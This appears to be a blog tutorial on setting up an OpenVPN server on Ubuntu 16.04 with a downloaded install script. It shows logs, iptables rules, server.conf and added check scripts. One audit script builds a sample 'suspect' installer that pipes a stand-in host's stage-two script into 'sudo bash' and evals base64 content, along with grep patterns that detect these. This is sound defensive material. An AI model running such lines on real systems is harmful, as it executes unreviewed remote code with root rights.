2018-07-15 08:00 AM

Install an OpenVPN server so that a PC with no global IP address can be reached from an external PC. OpenVPN is a full-featured SSL VPN (virtual private network). Setting it up by hand, including the SSL configuration files and certificates, is a little involved, but a shell script is distributed that performs all of these tasks on Ubuntu 16.04.

<Reference site>

https://www.cyberciti.biz/faq/howto-setup-openvpn-server-on-ubuntu-linux-14-04-or-16-04-lts/

The install process is as follows:

  1. Find and note down your public IP address
  2. Download the openvpn-install.sh script
  3. Run openvpn-install.sh to install the OpenVPN server
  4. Connect to the OpenVPN server using an iOS/Android/Linux/Windows client
  5. Verify your connectivity

 

1.Confirming the global IP Address

$ lshw

This command shows the logical name of the network interface (sudo lshw -class network limits the output to network devices). If the output shows "eth0":

$ ip addr show eth0

This prints the address assigned to that interface. If it is a global (public) IP address, note it down for step 3.

If the output shows only a local (private) address instead, the server is behind NAT; in that case check the following site: Tsukuba University VPN Site.

 

2.Download the shell script: openvpn-install.sh

$ wget https://git.io/vpn -O openvpn-install.sh

The output is as follows:

--2016-06-27 07:30:25--  https://git.io/vpn
Resolving git.io (git.io)... 23.23.173.104, 54.243.161.116, 23.23.111.66
Connecting to git.io (git.io)|23.23.173.104|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://raw.github.com/Nyr/openvpn-install/master/openvpn-install.sh [following]
--2016-06-27 07:30:26--  https://raw.github.com/Nyr/openvpn-install/master/openvpn-install.sh
Resolving raw.github.com (raw.github.com)... 151.101.100.133
Connecting to raw.github.com (raw.github.com)|151.101.100.133|:443... connected.
HTTP request sent, awaiting response... 301 Moved Permanently
Location: https://raw.githubusercontent.com/Nyr/openvpn-install/master/openvpn-install.sh [following]
--2016-06-27 07:30:27--  https://raw.githubusercontent.com/Nyr/openvpn-install/master/openvpn-install.sh
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.100.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.100.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 13340 (13K) [text/plain]
Saving to: ‘openvpn-install.sh’
 
openvpn-install.sh            100%[==============================================>]  13.03K  80.9KB/s    in 0.2s    
 
2016-06-27 07:30:28 (80.9 KB/s) - ‘openvpn-install.sh’ saved [13340/13340]
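Step 3 below hands this script to sudo, so it is worth looking at before running it. The following is an added example, not part of the original post or of the Nyr/openvpn-install project: it records the SHA-256 of a downloaded installer and greps it for the patterns that most often hide a second stage (remote content piped into a shell, base64-decoded or eval'd payloads). The two sample scripts it checks are constructed here for illustration; on the real machine run audit_installer on openvpn-install.sh itself.

```shell
#!/usr/bin/env bash
# Added example, not part of the original post or of the Nyr/openvpn-install
# project: sanity-check a downloaded installer before running it with sudo.
# The sample scripts below are constructed here for illustration.
set -u

# Print the SHA-256 of the file so the exact script that was run can be
# recorded and compared later (for example against the upstream git commit).
script_digest() {
    sha256sum "$1" | awk '{ print $1 }'
}

# Return 0 if the file looks like a plain shell installer, 1 if it contains
# patterns that must be read line by line before it gets root.
audit_installer() {
    local f="$1" rc=0
    if ! head -n 1 "$f" | grep -qE '^#!/(usr/)?bin/(env[[:space:]]+)?(ba)?sh'; then
        echo "$f: no shell shebang" >&2
        rc=1
    fi
    # Remote content piped straight into a shell (a second-stage download).
    if grep -nE '(curl|wget)[^|]*[|][[:space:]]*(sudo[[:space:]]+)?(ba)?sh' "$f"; then
        echo "$f: pipes downloaded content into a shell" >&2
        rc=1
    fi
    # Decoded or dynamically evaluated payloads hide what really runs.
    if grep -nE 'base64[[:space:]]+(-d|--decode)|eval[[:space:]]+"?\$' "$f"; then
        echo "$f: decodes or evals dynamic content" >&2
        rc=1
    fi
    return "$rc"
}

# Constructed samples (not the real openvpn-install.sh).
WORK=$(mktemp -d)
trap 'rm -rf "$WORK"' EXIT
CLEAN="$WORK/clean.sh"
SUSPECT="$WORK/suspect.sh"
cat > "$CLEAN" <<'EOF'
#!/bin/bash
apt-get install -y openvpn
wget -O /root/EasyRSA-3.0.1.tgz "https://github.com/OpenVPN/easy-rsa/releases/download/3.0.1/EasyRSA-3.0.1.tgz"
tar xzf /root/EasyRSA-3.0.1.tgz -C /root/
EOF
cat > "$SUSPECT" <<'EOF'
#!/bin/bash
apt-get install -y openvpn
curl -fsSL https://example.invalid/stage2.sh | sudo bash
eval "$(echo aGVsbG8= | base64 -d)"
EOF

for f in "$CLEAN" "$SUSPECT"; do
    echo "sha256 $(script_digest "$f")  $f"
    if audit_installer "$f"; then
        echo "$f: looks like a plain installer; still read it before 'sudo bash'"
    else
        echo "$f: review manually before running"
    fi
done
```

A clean result from audit_installer is not a verdict, only a filter: the script still runs as root and installs packages, so read it (it is about 13 KB) and keep the recorded digest so a later run can be compared against the upstream commit.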

 

3.Install OpenVPN Server

Run the shell script.

$ sudo bash openvpn-install.sh

The script asks for the following: the global IP address xx.xx.xx.xx, the protocol (TCP or UDP; UDP is recommended), the port number, the DNS resolvers to push to clients (Google: 8.8.8.8, 8.8.4.4; APNIC and Cloudflare: 1.1.1.1, 1.0.0.1) and a client name (arbitrary, e.g. client). It then installs the packages and proceeds to generate the CA, server and client certificates:

Okay, that was all I needed. We are ready to setup your OpenVPN server now
Press any key to continue...
Get:1 http://security.ubuntu.com 
......
...
..
--2016-06-27 17:10:38--  https://github.com/OpenVPN/easy-rsa/releases/download/3.0.1/EasyRSA-3.0.1.tgz
Resolving github.com (github.com)... 192.30.252.120
Connecting to github.com (github.com)|192.30.252.120|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://github-cloud.s3.amazonaws.com/releases/4519663/9dab10e8-7b6a-11e5-91af-0660987e9192.tgz?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAISTNZFOVBIJMK3TQ%2F20160627%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20160627T114040Z&X-Amz-Expires=300&X-Amz-Signature=717ae4f606d1999b4c7c164ae06d163c494197f04aafffa9f760a8e0bf136136&X-Amz-SignedHeaders=host&actor_id=0&response-content-disposition=attachment%3B%20filename%3DEasyRSA-3.0.1.tgz&response-content-type=application%2Foctet-stream [following]
--2016-06-27 17:10:40--  https://github-cloud.s3.amazonaws.com/releases/4519663/9dab10e8-7b6a-11e5-91af-0660987e9192.tgz?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAISTNZFOVBIJMK3TQ%2F20160627%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20160627T114040Z&X-Amz-Expires=300&X-Amz-Signature=717ae4f606d1999b4c7c164ae06d163c494197f04aafffa9f760a8e0bf136136&X-Amz-SignedHeaders=host&actor_id=0&response-content-disposition=attachment%3B%20filename%3DEasyRSA-3.0.1.tgz&response-content-type=application%2Foctet-stream
Resolving github-cloud.s3.amazonaws.com (github-cloud.s3.amazonaws.com)... 54.231.72.3
Connecting to github-cloud.s3.amazonaws.com (github-cloud.s3.amazonaws.com)|54.231.72.3|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 40960 (40K) [application/octet-stream]
Saving to: ‘/root/EasyRSA-3.0.1.tgz’
 
/root/EasyRSA-3.0.1.tgz       100%[================================================>]  40.00K  38.8KB/s   in 1.0s   
 
2016-06-27 17:10:43 (38.8 KB/s) - ‘/root/EasyRSA-3.0.1.tgz’ saved [40960/40960]
 
 
init-pki complete; you may now create a CA or requests.
Your newly created PKI dir is: /etc/openvpn/easy-rsa/pki
Generating a 2048 bit RSA private key
........+++
...............................................................................................+++
writing new private key to '/etc/openvpn/easy-rsa/pki/private/ca.key.BjRh5frdDd'
-----
Generating DH parameters, 2048 bit long safe prime, generator 2
This is going to take a long time
....+.....+................................................................................+..................................................................................................................................................................+......................................
...
..
.................................................................................................................+........................................................................................................................................+.................................+......................................................+...++*++*
 
DH parameters of size 2048 created at /etc/openvpn/easy-rsa/pki/dh.pem
 
Generating a 2048 bit RSA private key
.......................................................................+++
..................................................+++
writing new private key to '/etc/openvpn/easy-rsa/pki/private/server.key.9ieuluTC2R'
-----
Using configuration from /etc/openvpn/easy-rsa/openssl-1.0.cnf
Check that the request matches the signature
Signature ok
The Subject's Distinguished Name is as follows
commonName            :ASN.1 12:'server'
Certificate is to be certified until Jun 25 11:55:48 2026 GMT (3650 days)
 
Write out database with 1 new entries
Data Base Updated
Generating a 2048 bit RSA private key
.........+++
.........+++
writing new private key to '/etc/openvpn/easy-rsa/pki/private/iphone.key.lokNfOiobc'
-----
Using configuration from /etc/openvpn/easy-rsa/openssl-1.0.cnf
Check that the request matches the signature
Signature ok
The Subject's Distinguished Name is as follows
commonName            :ASN.1 12:'iphone'
Certificate is to be certified until Jun 25 11:55:48 2026 GMT (3650 days)
 
Write out database with 1 new entries
Data Base Updated
Using configuration from /etc/openvpn/easy-rsa/openssl-1.0.cnf
 
An updated CRL has been created.
CRL file: /etc/openvpn/easy-rsa/pki/crl.pem
 
244
 
Looks like your server is behind a NAT!
 
If your server is NATed (e.g. LowEndSpirit), I need to know the external IP
If that's not the case, just ignore this and leave the next field blank
External IP:

The script also adds iptables rules that accept UDP port 1194, forward traffic from the VPN subnet 10.8.0.0/24 and SNAT it to the server's public address (139.59.1.155 in this output). They are written to /etc/rc.local so that they are re-applied at boot. To check them, run the following command.

$ cat /etc/rc.local

The output is:

iptables -I FORWARD -m state --state RELATED,ESTABLISHED -j ACCEPT
iptables -I FORWARD -s 10.8.0.0/24 -j ACCEPT
iptables -I INPUT -p udp --dport 1194 -j ACCEPT
iptables -t nat -A POSTROUTING -s 10.8.0.0/24 -j SNAT --to 139.59.1.155

Confirm the OpenVPN server configuration the script generated with the following command.

$ sudo vi /etc/openvpn/server.conf

The contents are:

port 1194
proto udp
dev tun
sndbuf 0
rcvbuf 0
ca ca.crt
cert server.crt
key server.key
dh dh.pem
tls-auth ta.key 0
topology subnet
server 10.8.0.0 255.255.255.0
ifconfig-pool-persist ipp.txt
push "redirect-gateway def1 bypass-dhcp"
push "dhcp-option DNS 8.8.8.8"
push "dhcp-option DNS 8.8.4.4"
keepalive 10 120
cipher AES-128-CBC
comp-lzo
user nobody
group nogroup
persist-key
persist-tun
status openvpn-status.log
verb 3
crl-verify crl.pem
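Before opening port 1194 to the Internet it pays to check the generated server.conf against a short list of settings rather than reading it by eye. The following lint script is an added example, not part of the original post or of the openvpn-install project. It checks that a control-channel HMAC key (tls-auth or tls-crypt) and crl-verify are present, that the daemon drops to nobody/nogroup, that compression is off, and that a full-tunnel push also pushes DNS. The two sample configurations are constructed inline (the first is a copy of the file shown above) so the script runs offline; on the server pass /etc/openvpn/server.conf instead.

```shell
#!/usr/bin/env bash
# Added example, not part of the original post or of the openvpn-install
# project: lint a generated /etc/openvpn/server.conf for the settings a
# reviewer checks before exposing the service. Sample configs are constructed
# inline so the script runs offline; on the real server pass the file path.
set -u

# Return the value of a directive (first match, empty if absent).
conf_get() {
    awk -v key="$2" '$1 == key { $1 = ""; sub(/^ /, ""); print; exit }' "$1"
}

# Print one line per finding and return the number of findings.
lint_server_conf() {
    local f="$1" findings=0
    # Control-channel HMAC: without tls-auth/tls-crypt every packet from the
    # Internet reaches the TLS code before any client authentication.
    if ! grep -qE '^(tls-auth|tls-crypt)[[:space:]]' "$f"; then
        echo "missing tls-auth/tls-crypt: unauthenticated packets hit the TLS stack"
        findings=$((findings + 1))
    fi
    # Revocation: without crl-verify a revoked client cert still connects.
    if ! grep -qE '^crl-verify[[:space:]]' "$f"; then
        echo "missing crl-verify: revoked client certificates are still accepted"
        findings=$((findings + 1))
    fi
    # Privilege drop once the tunnel is up.
    if [ "$(conf_get "$f" user)" != "nobody" ] || [ "$(conf_get "$f" group)" != "nogroup" ]; then
        echo "daemon keeps root: set 'user nobody' and 'group nogroup'"
        findings=$((findings + 1))
    fi
    # Compressing plaintext inside an encrypted tunnel leaks data through
    # size differences (the same class of attack as CRIME/BREACH on TLS).
    if grep -qE '^(comp-lzo|compress)' "$f"; then
        echo "compression enabled (comp-lzo/compress): remove it"
        findings=$((findings + 1))
    fi
    # Full-tunnel clients still leak DNS unless resolvers are pushed with it.
    if grep -q '^push "redirect-gateway' "$f" && ! grep -q '^push "dhcp-option DNS' "$f"; then
        echo "redirect-gateway without pushed DNS: clients query their local resolver"
        findings=$((findings + 1))
    fi
    return "$findings"
}

WORK=$(mktemp -d)
trap 'rm -rf "$WORK"' EXIT
AS_GENERATED="$WORK/server.conf"
HARDENED="$WORK/server-hardened.conf"
# Copy of the configuration shown in the post.
cat > "$AS_GENERATED" <<'EOF'
port 1194
proto udp
dev tun
ca ca.crt
cert server.crt
key server.key
dh dh.pem
tls-auth ta.key 0
topology subnet
server 10.8.0.0 255.255.255.0
push "redirect-gateway def1 bypass-dhcp"
push "dhcp-option DNS 8.8.8.8"
push "dhcp-option DNS 8.8.4.4"
keepalive 10 120
cipher AES-128-CBC
comp-lzo
user nobody
group nogroup
persist-key
persist-tun
crl-verify crl.pem
EOF
# Same file with the compression directive removed.
grep -v '^comp-lzo' "$AS_GENERATED" > "$HARDENED"

for f in "$AS_GENERATED" "$HARDENED"; do
    echo "== $f"
    if lint_server_conf "$f"; then echo "no findings"; else echo "$? finding(s)"; fi
done
```

On the configuration above the only finding is comp-lzo; removing that line (on both server and client, since the setting must match) clears it. The cipher line is deliberately left alone: the OpenVPN 2.3 shipped with Ubuntu 16.04 has no AEAD ciphers, so AES-128-CBC with tls-auth is what is available there; on OpenVPN 2.4 or later prefer AES-256-GCM.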

 

4.Copy the configuration file created by the shell script

Copy "client.ovpn" to the client machine (into whichever directory you like). The file embeds the client's private key together with the CA certificate and the tls-auth key, so transfer it over a secure channel such as scp and do not send it by e-mail.

5.Access from the Client

Start the OpenVPN client with the client.ovpn file (OpenVPN must also be installed on the client PC).

$ sudo openvpn --client --config client.ovpn
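Once the client logs "Initialization Sequence Completed", step 5 of the procedure (verify connectivity) means confirming two things: tun0 received an address from the 10.8.0.0/24 pool configured on the server, and the pushed redirect-gateway actually moved the default route into the tunnel. The following is an added example, not part of the original post: the two checks are written as functions that parse ip(8) output passed in as text, exercised first on constructed sample output (one working case, one where traffic still leaves via eth0) and then, when run on a Linux client with tun0 up, on the live system.

```shell
#!/usr/bin/env bash
# Added example, not part of the original post: checks to run on the client
# after "openvpn --client --config client.ovpn" reports
# "Initialization Sequence Completed". The parsing functions take command
# output as text so they can be exercised on the constructed samples below;
# the final block runs them against the live system when tun0 exists.
set -u

VPN_NET_PREFIX="10.8.0."   # from "server 10.8.0.0 255.255.255.0" in server.conf

# Given the output of "ip -4 -o addr show dev tun0", print the interface's
# address and return 0 only if it comes from the VPN pool.
tun_has_vpn_addr() {
    local addr
    addr=$(printf '%s\n' "$1" | awk '$3 == "inet" { split($4, a, "/"); print a[1]; exit }')
    [ -n "$addr" ] || return 1
    printf '%s\n' "$addr"
    case "$addr" in
        "$VPN_NET_PREFIX"*) return 0 ;;
        *) return 1 ;;
    esac
}

# Given the output of "ip route get <internet address>", return 0 if the
# route leaves through a tun interface (i.e. redirect-gateway took effect).
route_via_tun() {
    printf '%s\n' "$1" | awk '
        { for (i = 1; i < NF; i++) if ($i == "dev" && $(i+1) ~ /^tun[0-9]+$/) found = 1 }
        END { if (found) exit 0; exit 1 }'
}

# Run both checks; return 0 only if both pass.
check_vpn() {   # $1 = addr output, $2 = route output
    local ok=0
    tun_has_vpn_addr "$1" >/dev/null && echo "tun0 has a VPN address" \
        || { echo "tun0 is not up on the VPN subnet"; ok=1; }
    route_via_tun "$2" && echo "Internet traffic goes through the tunnel" \
        || { echo "Internet traffic bypasses the tunnel"; ok=1; }
    return "$ok"
}

# Constructed samples: typical output once the tunnel is up, and a leak case.
SAMPLE_ADDR='5: tun0    inet 10.8.0.2/24 scope global tun0\       valid_lft forever preferred_lft forever'
SAMPLE_ROUTE_OK='8.8.8.8 via 10.8.0.1 dev tun0 src 10.8.0.2 uid 1000
    cache'
SAMPLE_ROUTE_LEAK='8.8.8.8 via 192.168.1.1 dev eth0 src 192.168.1.23 uid 1000
    cache'

echo "== constructed sample: tunnel up"
check_vpn "$SAMPLE_ADDR" "$SAMPLE_ROUTE_OK"
echo "== constructed sample: route still via eth0"
check_vpn "$SAMPLE_ADDR" "$SAMPLE_ROUTE_LEAK" || echo "(expected failure on the leak sample)"

# Live check on a Linux client where tun0 exists.
if command -v ip >/dev/null 2>&1 && ip link show tun0 >/dev/null 2>&1; then
    echo "== live system"
    check_vpn "$(ip -4 -o addr show dev tun0)" "$(ip route get 8.8.8.8 2>/dev/null || true)"
fi
```

As a final check from the client, fetch your address from any what-is-my-IP service: it must show the server's global IP from step 1, not the client's own.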

 

Running the script again on a server where OpenVPN is already installed shows a management menu instead of reinstalling:

Looks like OpenVPN is already installed

What do you want to do?
   1) Add a cert for a new user      (issue a certificate for an additional client)
   2) Revoke existing user cert      (revoke a client certificate)
   3) Remove OpenVPN                 (uninstall OpenVPN)
   4) Exit                           (quit)
Select an option [1-4]: 

Please also check the same topic in the forum.